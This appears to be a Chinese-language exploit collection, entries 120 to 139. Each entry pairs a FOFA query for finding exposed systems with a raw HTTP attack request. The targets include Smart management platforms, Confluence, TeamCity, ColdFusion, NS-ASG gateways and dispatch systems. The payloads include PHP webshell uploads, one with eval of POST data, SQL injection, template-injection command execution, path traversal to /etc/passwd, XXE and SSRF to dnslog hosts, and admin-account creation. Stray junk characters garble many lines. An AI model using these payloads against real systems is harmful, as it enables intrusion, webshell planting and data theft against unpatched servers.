* a- v4 F8 m7 }) Z120. 北京百绰智能S40管理平台导入web.php任意文件上传
' t( }9 K" A Z2 i2 lCVE-2024-1253
# o' t2 A5 U2 h0 P" S: F2 FFOFA:title="Smart管理平台"1 w/ R. e: G* C. h2 V+ \
POST /useratte/web.php? HTTP/1.15 b3 X0 O7 @1 u" x( U X
Host: ip:port) ]3 w" Z7 y. b9 f" N
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db) ]8 m7 {6 I6 S6 n* W- B
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko$ H( P0 d/ r/ K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; A* G' ^" a0 p* X2 _6 J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ \! p5 |% O8 t+ v: j$ J& x NAccept-Encoding: gzip, deflate
: f" I8 g" D7 `4 PContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
d: G) ?$ ?2 D) @ C3 c+ VContent-Length: 597
! d5 s. o/ P( r' i/ U- J. vOrigin: https://ip:port
+ j0 R% I @0 }) S( T/ vReferer: https://ip:port/sysmanage/licence.php2 T- t; ]* [+ l- n
Upgrade-Insecure-Requests: 1
# e, Q5 U* B2 h. a& Z2 |Sec-Fetch-Dest: document/ a4 U. n* L6 r
Sec-Fetch-Mode: navigate
! W; g- d* q3 d/ B1 g0 dSec-Fetch-Site: same-origin
7 M- n) e! f$ D; e# ^7 TSec-Fetch-User: ?1
( U, U, c. g7 yTe: trailers* j( q& N7 b6 ^3 Z% m+ k% c
Connection: close
0 z* B3 N0 F$ C) b8 v- ^ e# i
' j9 I+ v3 ~! F: w# G-----------------------------42328904123665875270630079328
9 o# V6 S2 h& a8 l% WContent-Disposition: form-data; name="file_upload"; filename="2.php"( q" C6 E4 ^& e3 @3 C0 }+ t
Content-Type: application/octet-stream
- q$ k/ Z, |/ k1 c5 X# G; t: c- d1 e5 Q+ R1 a
<?php phpinfo()?>: T2 D U$ f/ w8 g7 e" C; ]
-----------------------------42328904123665875270630079328
+ [5 g9 O) Z i6 n( uContent-Disposition: form-data; name="id_type"* E5 {, p; H* ?" [ l$ i
4 u) a7 O# o2 F" O _4 L1 I1) g" E- S; [$ P. [
-----------------------------42328904123665875270630079328
5 I$ ~: b8 I* c1 K' c/ F$ qContent-Disposition: form-data; name="1_ck"
- ~$ F% q$ u( r0 a1 K; ?* z2 \
' k. B1 Y8 l. m- }+ D1_radhttp. j/ R7 n4 s3 L" b/ U% V2 ~7 V' G
-----------------------------42328904123665875270630079328
0 n* o1 @0 A Q9 l- mContent-Disposition: form-data; name="mode"2 Y" T: l$ |5 v6 j
) j4 f: w/ o- c# m. G5 q0 k
import
3 H e9 ^$ t9 E9 j! _ |+ K/ J-----------------------------42328904123665875270630079328
% S! D% x" e# M; M6 ^
( M3 S$ |+ z' S e; M9 @( ?/ q" O" f" D: b& S
文件路径/upload/2.php
2 H+ Z1 R$ b; G+ C' ^. _8 x: M4 x$ X# S) {. C
121. 北京百绰智能S42管理平台userattestation.php任意文件上传- z' a0 |) u( u4 b& }, G6 l
CVE-2024-1918
- P$ t. ~2 E6 oFOFA:title="Smart管理平台"
" ~: J/ C' J* g: r3 j7 a8 aPOST /useratte/userattestation.php HTTP/1.17 ~ w, x$ T7 R! Y; G( K5 `' Q
Host: 192.168.40.130:8443! U, S8 ]" o4 j- f2 K J5 P3 n- G
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
) a. f6 e8 ?. y; S1 }. D4 oUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko1 v$ q" h* u; O7 {7 e$ l& f! {! z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( N, \5 ~' H' O( s+ n* Z5 M4 D% B% }* c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 }5 k3 v+ u! G+ ?+ p; A, s0 X2 RAccept-Encoding: gzip, deflate
, M9 z \3 I5 I: \ o6 t a. SContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
. {$ ]6 f6 M% J0 m$ KContent-Length: 592
# u. X L6 F8 l8 S( WOrigin: https://192.168.40.130:8443
$ i& {1 C `& GUpgrade-Insecure-Requests: 12 J' h/ ?7 B& ?- ~, q
Sec-Fetch-Dest: document
7 n" O: P7 s }- t8 D0 V$ ySec-Fetch-Mode: navigate
8 m% Q* R2 H' y+ oSec-Fetch-Site: same-origin
$ Q5 f( ]5 J, N! U& z' [$ NSec-Fetch-User: ?19 H2 l6 ]. Q; ~1 b$ g( g" m2 P ]
Te: trailers: _" b a$ y- e: _
Connection: close
/ E1 y t& [8 R4 d- n
4 G3 m4 {2 `: X) J" t6 m-----------------------------42328904123665875270630079328+ t- X# g& o9 U: A1 J
Content-Disposition: form-data; name="web_img"; filename="1.php"
/ r. F6 m" i* K! L$ U+ F7 Z4 pContent-Type: application/octet-stream
, L6 s; O# O* V6 s; d# B8 H
* T4 {- ~7 ~% d/ X6 a0 i7 H V" z. E<?php phpinfo();?>
' m- \1 X) o( i-----------------------------42328904123665875270630079328( W9 [. i- ^* r( S7 y+ E
Content-Disposition: form-data; name="id_type"' G2 f: L9 _* d
4 N6 v: N" `. W/ r/ f
1% |$ o0 A9 P# I% W( P" H8 ~
-----------------------------423289041236658752706300793283 O7 M: d. S% G" a: ~
Content-Disposition: form-data; name="1_ck"* Z' c0 S/ M/ ~2 d* G! ]. ^
1 {. Z$ A: L( V" k& [, s. l) `
1_radhttp
, w0 w' V) B- z, u) b' @-----------------------------42328904123665875270630079328
! h5 t5 _( y) M6 p. R& lContent-Disposition: form-data; name="hidwel": a: G! J' x! O# K3 b* I$ I
0 ?4 t* c# ~' u$ kset/ i! K# V$ N. w/ D# j
-----------------------------42328904123665875270630079328; {7 i5 J; H2 h' ~
" R9 q( N9 I: c9 C2 @
6 v0 J; t C& Y3 E% D7 tboot/web/upload/weblogo/1.php
' V" L7 g! m* ?: r) p' Z6 Z
7 z- |. U( E+ O5 D122. 北京百绰智能s200管理平台/importexport.php sql注入7 `( a: y" I x3 | E0 R
CVE-2024-27718FOFA:title="Smart管理平台"
/ ]: L4 f" ?4 L' q其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
! w( n# _' Q$ `& _8 tGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.14 {* F/ o$ f5 _1 H
Host: x.x.x.x
- y! A0 O+ E+ L4 O, vCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
% ~5 H; C' i; ?2 Z4 Z& X: p& [) e5 v9 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
' h* `+ |% z# L, W+ vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 }# Z6 s) x- r2 u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 i/ A( k3 ^6 H2 x
Accept-Encoding: gzip, deflate, br
6 f* j+ e# Y! R' S5 ~+ Z" |& m) QUpgrade-Insecure-Requests: 1
* q$ r/ J% W' [8 o& Y$ \Sec-Fetch-Dest: document
5 }6 _6 Y% L# p5 |4 x+ u7 `/ P! RSec-Fetch-Mode: navigate$ ^( o0 Y0 q1 n9 e! t. i
Sec-Fetch-Site: none
6 n2 @/ |- z+ k ^' H* @! sSec-Fetch-User: ?1$ H' L2 W, P' e% ]4 x. C+ s
Te: trailers
4 |7 p: W+ Y6 T1 q) h5 P- XConnection: close
# R" Q3 M0 x) t: u8 @
3 P& ^; I C& R. T u( \+ f6 w
. Z" e1 L% f0 y123. Atlassian Confluence 模板注入代码执行3 z+ f$ Q$ C/ \
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
3 {2 P- J( U! B( W M9 yPOST /template/aui/text-inline.vm HTTP/1.1- M* X# K* k5 H$ A s
Host: localhost:8090: m0 @" k8 V+ { {, x
Accept-Encoding: gzip, deflate, br
- s/ v# g ?7 u) uAccept: */*
0 ?! j2 w" G2 m+ V; LAccept-Language: en-US;q=0.9,en;q=0.82 v: f: I. r& |6 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
/ b R& I( ]$ G) a9 B. m* J; {Connection: close
3 p$ F: v3 T! A& R3 ]' J4 w( LContent-Type: application/x-www-form-urlencoded
8 E5 ]) [( K* n3 Q' Y n' h/ `" G. ]
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})), S5 s4 d, d6 v! W! n1 k
$ z4 ]9 g9 V4 k) Q8 ?( @
) Z) K: \1 _$ x: g/ ?$ H% m2 B
124. 湖南建研工程质量检测系统任意文件上传5 J! V' X" @0 O) A- D" G" l
FOFA:body="/Content/Theme/Standard/webSite/login.css"3 g+ \& R: A! F' l( E
POST /Scripts/admintool?type=updatefile HTTP/1.1
7 G( ~/ q6 D# THost: 192.168.40.130:8282
7 }) N! U# Y$ w5 lUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36' s4 M- C' d5 Z( H, j
Content-Length: 72" @* a# O: b) w' h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.86 d& H4 c6 B, c/ X) O
Accept-Encoding: gzip, deflate, br1 ^ l! e0 \8 N2 w+ l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 k( |, a) r" x5 r+ oConnection: close
; H- ~! o+ }& \+ T. WContent-Type: application/x-www-form-urlencoded0 m3 I, [' A: c6 u
. M. G+ O: {+ ?. u( C: M
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
; o+ S1 S# F0 K" c. a9 q2 x
g- u9 K) m$ ]' L5 v
( m3 ^- {; K! x" [5 R( w+ {http://192.168.40.130:8282/Scripts/abcgcg.aspx) r- K( x/ U& y/ G4 a4 Y9 h6 z" H$ i
8 Z; U S& {% ~+ R2 Z3 ]
125. ConnectWise ScreenConnect身份验证绕过4 G' }' x( s. a$ M+ ?6 G: x; ~. @
CVE-2024-1709- B5 n5 z# @( O' q" s4 z9 W
FOFA:icon_hash="-82958153"
. C8 w* O. d8 W% ehttps://github.com/watchtowrlabs ... bypass-add-user-poc0 V3 f+ G3 }/ h v% O }1 c
: k3 b; K' |& ?* T. R
5 y3 U) y/ K7 ]8 `) C4 A9 N# E使用方法, d* s- W4 F# `8 p5 D' O
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
$ e8 G! q) D+ q/ Z2 o# }9 s6 k+ x6 z9 P4 B4 {/ T( h+ o: [( z6 S
7 t! P* M6 {1 I& H7 z& D+ v( |3 F创建好用户后直接登录后台,可以执行系统命令。
' W( t) }/ z; L" m! X7 m% q, D+ |; s9 l% p9 w; p
126. Aiohttp 路径遍历
9 a8 K# H' ?( s. u" K3 C- \FOFA:title=="ComfyUI"
7 S$ E0 C+ N# @5 L; \) {' zGET /static/../../../../../etc/passwd HTTP/1.1+ S* k+ W" R. o; V. M
Host: x.x.x.x- k# H4 k2 y" t# ^/ r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.361 \) S' K; x5 _8 h# t4 @3 [! v
Connection: close
# z. @, e* W2 K/ I0 nAccept: */*4 r4 V$ W }: q( C* p% K
Accept-Language: en0 V8 }: G. L# ?) b% u0 G/ \4 D, j
Accept-Encoding: gzip
7 X3 T% Q) x6 ^* Y% d4 L. Q5 `
4 U* _# S4 y6 R( d |: _# u& W; d: s" S2 ]- j0 b0 Y
127. 广联达Linkworks DataExchange.ashx XXE
5 `+ f$ b: f$ B. G; o1 J; lFOFA:body="Services/Identification/login.ashx" 2 y k# Q" `1 ~4 Z! [! D& a2 o
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
& E7 ?- }4 }3 q; t _Host: 192.168.40.130:8888& p$ x* e, f* t4 _3 w9 a8 ^- J" M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36$ E' |* c: x- P# F) N8 J& A/ U, k
Content-Length: 415- m+ ~& b! Z* E6 i+ F' H' y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ S U$ G5 O1 y; v
Accept-Encoding: gzip, deflate0 D: }- P4 P0 }
Accept-Language: zh-CN,zh;q=0.9" b4 z! I, l: t- [1 s# T
Connection: close
* l+ X* g+ F" x1 x6 g7 o- s; DContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
& p a/ D$ m# n. n; r; @. F Y& APurpose: prefetch. T1 U3 x+ ?2 c$ ]5 H; A1 i
Sec-Purpose: prefetch;prerender+ c- J, C% K3 I! i9 F! D" K
- ~; J' H4 B! b7 ?/ D# ]& ?------WebKitFormBoundaryJGgV5l5ta05yAIe0. F1 A. b9 q A$ K; L7 D
Content-Disposition: form-data;name="SystemName"
. n: H# a! F8 P, ?& u4 R/ P1 H0 f6 u/ r* C
BIM/ j+ p6 Z& `3 B8 R( w) e
------WebKitFormBoundaryJGgV5l5ta05yAIe03 h; Z6 r: A: O* e+ u: r
Content-Disposition: form-data;name="Params"
. ]+ y8 f A, w1 oContent-Type: text/plain- K/ z7 j/ g. u& B
# k: D: @8 I2 Z; G( E. p2 c<?xml version="1.0" encoding="UTF-8"?>6 o3 S# T# \$ g* n# ^
<!DOCTYPE test [# P+ a2 t& ?% Y/ s- ~
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">& m8 m8 p! Y0 ~6 {9 E
]
* C$ _( H" _ v0 ]. P>& e; h# F, U* `$ y' q; v
<test>&t;</test>2 S7 a6 ^, q- r
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
3 _; }, X# P. J% `$ d
2 n( F5 s, b& c0 F) N7 W1 [0 \, R8 a q; z" d, R
f$ q3 b. K5 t( q128. Adobe ColdFusion 反序列化/ x1 I4 R6 U, x9 q) _
CVE-2023-38203
& K3 ~% W! {3 o% l% @3 ?9 s4 ^Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本). d2 ^: r! p0 P: e+ d" x0 H
FOFA:app="Adobe-ColdFusion"
- [; n& V" N( A0 f0 N) wPAYLOAD9 T! Z) w8 Q/ F, Y) f5 l. a" e
; B( n( v% C! R% s& h H! J1 b- s
129. Adobe ColdFusion 任意文件读取
+ |+ n; m# C* x" A8 R( C$ o- Z' c* xCVE-2024-20767# I# N$ }) g9 B' m
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"( Y* E, b/ H0 s! U0 H: P
第一步,获取uuid" f% Z6 _4 p3 q, y/ B' [1 c
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
! E% h1 i3 ^- P2 Q; `Host: x.x.x.x
1 t+ w+ V7 L) p# L. c$ vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36: Z$ }* \: O6 j( E' w0 S! O
Accept: */*
! J$ ?2 m% B) dAccept-Encoding: gzip, deflate
7 y" N- B G* _/ F6 l/ T3 F/ BConnection: close% U2 t; D3 m+ N( N/ u
# h3 g8 ]6 Y8 N! A0 }
3 K6 L7 X5 W6 S( a! v* q- z第二步,读取/etc/passwd文件: G) `( G* _3 U3 e0 u
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.16 u5 s) } q" C4 ~- z) ?
Host: x.x.x.x
+ L6 I* H8 S. Q4 zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.364 u, z% ~& q1 m6 D+ S. m
Accept: */*$ S# F+ ]0 q; i
Accept-Encoding: gzip, deflate
2 P, K9 _, D1 D" L% ~Connection: close
6 l$ C' u, d/ m7 O/ \uuid: 85f60018-a654-4410-a783-f81cbd5000b9
: ?6 H w7 u# D4 K
. g4 Y2 n+ N. k% t5 l* S4 K! S! W' e' o. ?, F+ X* C I
130. Laykefu客服系统任意文件上传
$ ~" N) h% t: K1 F! vFOFA:icon_hash="-334624619"
2 g* d1 M/ U$ n, v- j6 ~9 k. e! sPOST /admin/users/upavatar.html HTTP/1.1& D+ O) H7 x% U" l% W6 K
Host: 127.0.0.14 W. o; T; z; M- V8 H. f0 J( v+ r
Accept: application/json, text/javascript, */*; q=0.01
/ ]. Y2 v% ]4 n$ g0 R& E: ~/ eX-Requested-With: XMLHttpRequest* Q: W+ `7 G9 m5 l$ G! D
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.262 w8 Z, `6 V% V% f# ^# o, d6 e
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR' K9 {4 c: j9 a" d; Y
Accept-Encoding: gzip, deflate
, s3 O- ? y- \6 I6 PAccept-Language: zh-CN,zh;q=0.9
4 x+ Q/ l: h/ o1 l: mCookie: user_name=1; user_id=3& E7 T, h" j8 K% I
Connection: close6 i- R' n) G- j& h7 o
6 {8 X6 s0 W- E( Y) Y8 n------WebKitFormBoundary3OCVBiwBVsNuB2kR
$ {: d- G' ] z0 W; V0 P7 aContent-Disposition: form-data; name="file"; filename="1.php"
% B0 b8 P4 @, I! a+ V- H2 rContent-Type: image/png) f9 M1 L$ h* I9 }; j. |9 V
" f) z; \: n: M2 ^' H
<?php phpinfo();@eval($_POST['sec']);?>9 H6 _ U5 L/ w6 {9 u$ a1 r
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
6 R- b- ^1 P- m$ k- d. ^( z% @: {7 s7 P/ y$ R
) B" s% p8 ?2 T# k131. Mini-Tmall <=20231017 SQL注入, b8 ?. R% ~0 b" X/ V8 d
FOFA:icon_hash="-2087517259"# U4 S. X/ |5 ~; P6 g
后台地址:http://localhost:8080/tmall/admin
0 ` }& y% W0 ^2 O" {( zhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)8 `6 d; Z: m2 Y! m% M8 Z3 p
) u8 m* Q. t. m0 n132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过& } N' r. N }, c7 R: G
CVE-2024-27198
. A' M# O: ]: ?+ b5 K; Z1 e% B: o" FFOFA:body="Log in to TeamCity"
2 ~2 H' T9 P; {5 `4 X1 A) FPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
7 ~% O, \4 e& q+ o/ HHost: 192.168.40.130:8111
" }: d; n4 h3 L: t# e* n# X( nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
, K1 k) F: X' w- d% d: `0 C c/ aAccept: */*' ~+ M1 \4 h6 A0 R# P r$ l
Content-Type: application/json
8 w, n) A$ V6 b) e& B- UAccept-Encoding: gzip, deflate
1 A! ]4 \& j5 t) ~: P1 Z3 B
' b4 z4 Y8 n8 u6 H8 Q' t! O{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
" x0 ?6 K- f/ Z# e' n& f; C5 n+ v) B% C! I3 O7 m
. [5 @9 z8 q) \3 G$ J9 `3 f: p
CVE-2024-27199
2 u! [6 B; R' ]' Q9 D" V8 B8 u/res/../admin/diagnostic.jsp
/ m4 b4 E7 D; R' r$ s' v/ [8 c0 h/.well-known/acme-challenge/../../admin/diagnostic.jsp
5 b0 A9 b4 D: `9 L/update/../admin/diagnostic.jsp9 _4 E" Z5 a, ~7 L; Z
, h1 d- k }6 u: _; r: u" G
6 \0 m: } E4 c0 G# }CVE-2024-27198-RCE.py- q7 ?. G7 U9 [+ M4 f
3 v7 X& E. W M7 c% C W133. H5 云商城 file.php 文件上传 a, [" e- |2 |+ R$ \6 G
FOFA:body="/public/qbsp.php"1 I# }& W) C. q: }! n7 N
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
4 [4 |% A$ u) A* yHost: your-ip, b! Z2 H$ z5 M+ ^) m6 j4 X& P2 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
3 x" a, d: `" u( T; _+ D% CContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx$ K1 ~& @2 y2 S) S/ Q! t. h
) C% Y6 N8 {- u! \ X. U
------WebKitFormBoundaryFQqYtrIWb8iBxUCx, t( Y+ K+ x, Z E
Content-Disposition: form-data; name="file"; filename="rce.php"1 l! S0 S# N9 l
Content-Type: application/octet-stream4 a# G7 H; I' }! S# [
' s' \/ u+ R# O7 w+ d8 U' Z2 s<?php system("cat /etc/passwd");unlink(__FILE__);?> q- b6 }. Z* j0 N
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--1 m) A3 s# M6 v
5 z% N6 \' {) Q" ]- m5 u+ O6 u* }* R, J' p7 T" x- l
& y5 H3 n- C- p" F% J
134. 网康NS-ASG应用安全网关index.php sql注入* |( b; K* E5 p$ [/ w+ w
CVE-2024-23303 E% m, B% { \0 T3 a; T1 L
Netentsec NS-ASG Application Security Gateway 6.3版本' l @- |9 E0 H
FOFA:app="网康科技-NS-ASG安全网关"( [2 P. F* d; b3 @! y. h* H
POST /protocol/index.php HTTP/1.1, L. e9 X' n& t* x% s
Host: x.x.x.x( R b1 P8 c2 d) }6 {
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
- F; V6 |; v$ E7 j2 N! u* z8 C# R! u4 H1 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
' m. P* x4 G! t7 {' `' i; h/ `Accept: */*
/ o: S# f+ _- M% p7 I5 I J- OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- m5 y/ D( \- ~$ H8 \; G
Accept-Encoding: gzip, deflate! u' I; W( C) D# h
Sec-Fetch-Dest: empty
( O8 @# _0 }# F4 x+ S- s ?Sec-Fetch-Mode: cors
1 [% W& H! T3 Y1 M7 }! D; hSec-Fetch-Site: same-origin
: a0 q% M8 a, P7 o j& lTe: trailers. C" t& G+ |" j, K
Connection: close
$ h5 L& H+ q( \( z# GContent-Type: application/x-www-form-urlencoded
' G9 o" h( G. r$ o. J4 V# SContent-Length: 263
# Q$ s$ e% ?7 r, P3 O
! r+ v9 D( Q4 D' o- Q0 J$ x8 wjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
: u$ c8 g# A% e8 X2 E- r3 i4 n! z
5 h3 m, ^* V- w# i3 I/ r F/ t
2 b. R1 E; k. K7 L135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入0 W a: k' o4 Q3 z; R0 B
CVE-2024-2022# J8 m9 q7 [4 c1 o! t( I, t
Netentsec NS-ASG Application Security Gateway 6.3版本
; c+ Q( T- A' i5 i$ ]0 RFOFA:app="网康科技-NS-ASG安全网关"
) Y# [0 ^( ^5 WGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1+ c/ k2 r! O- F3 v: [' n
Host: x.x.x.x. w( s* n& Z4 w* D) U( Z& |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36! X) T" x ?8 D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* T# P4 A3 `4 Y+ W7 X7 a5 _2 t4 vAccept-Encoding: gzip, deflate8 Z- [5 i) s; J
Accept-Language: zh-CN,zh;q=0.9' e+ n0 N' U3 d; {4 j
Connection: close
; J& r& o3 q0 R& B1 ?( ^! ~8 R( j+ k" f
" O/ |. Y4 p7 v+ m136. NextChat cors SSRF
9 y& ^4 Z% g. C8 a8 ACVE-2023-497856 L; o. e$ R8 `1 D; a2 S/ X+ S
FOFA:title="NextChat", d0 i1 M2 d3 v+ R. [* E
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
6 W& r9 a9 ^7 ?# z8 AHost: x.x.x.x:10000( o2 Y' w. Q8 Z y
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- ?/ ?+ h9 d" Z( I, FConnection: close
: o/ x, h5 x0 v( f: tAccept: */*+ x2 ~% U: \% Q* L6 m7 _1 {
Accept-Language: en
& g( y; P9 e2 G _, eAccept-Encoding: gzip
% m& N& o0 F# N) g: K* u% I! y) ?
( |5 T" x# z( }, y# V1 n& e% o
* _7 r( _- C- v; b7 d137. 福建科立迅通信指挥调度平台down_file.php sql注入. v$ Y* C2 u: e M) |
CVE-2024-26202 I& |8 P7 c" Z; E3 t; ?
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
$ I& b! F0 f' l0 c* g3 \2 IGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.19 f( A# o, Z: D3 Y! W& Z/ h
Host: x.x.x.x1 O6 g: Y. L- T7 b% F3 @! A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
" M3 g) j/ }7 O; d' nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' f" ?! f7 i+ F$ U D6 n' A% h0 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 i% n0 O1 B& Q+ u# G) WAccept-Encoding: gzip, deflate, br
+ Y& F# W$ Q4 m0 f8 RConnection: close0 k( d8 h7 Z- u9 O, P
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj- q( M4 R8 p1 F1 R! e& p8 C& I
Upgrade-Insecure-Requests: 1( G3 _$ m$ @/ F& R; H
+ T( [9 j% O& n- o
2 g/ ?" f8 R! F0 m* c. A, b' F
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入7 y; n6 ~4 a& @* o
CVE-2024-26212 q' L# |+ S, b
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台": B) W: P. ?9 L: _$ J
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.11 c8 p. x# j) o* B J7 I
Host: x.x.x.x" v" [, t% N: q4 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0$ Q$ P/ v9 A7 d9 q6 P/ `# j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 G+ r- V( y+ O Y }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% I- @) U2 J/ R W2 |3 WAccept-Encoding: gzip, deflate, br- M2 p. Q) Q5 A1 M0 v
Connection: close
+ V. E! ~4 p+ r9 l+ Q9 h" c! eUpgrade-Insecure-Requests: 1
) i- d$ R# p8 Y3 {7 b& i( W$ A3 _; Q4 J, r8 a m8 \2 A$ G
1 d" e& l8 Y5 e7 D" F& f* F139. 福建科立讯通信指挥调度平台editemedia.php sql注入# W6 D3 r1 u) w# k' _/ t, k# `
CVE-2024-2622
+ v0 F9 r- Z& q6 I a& Z6 e0 d1 y5 NFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"/ K/ h5 H; Q m% a1 O
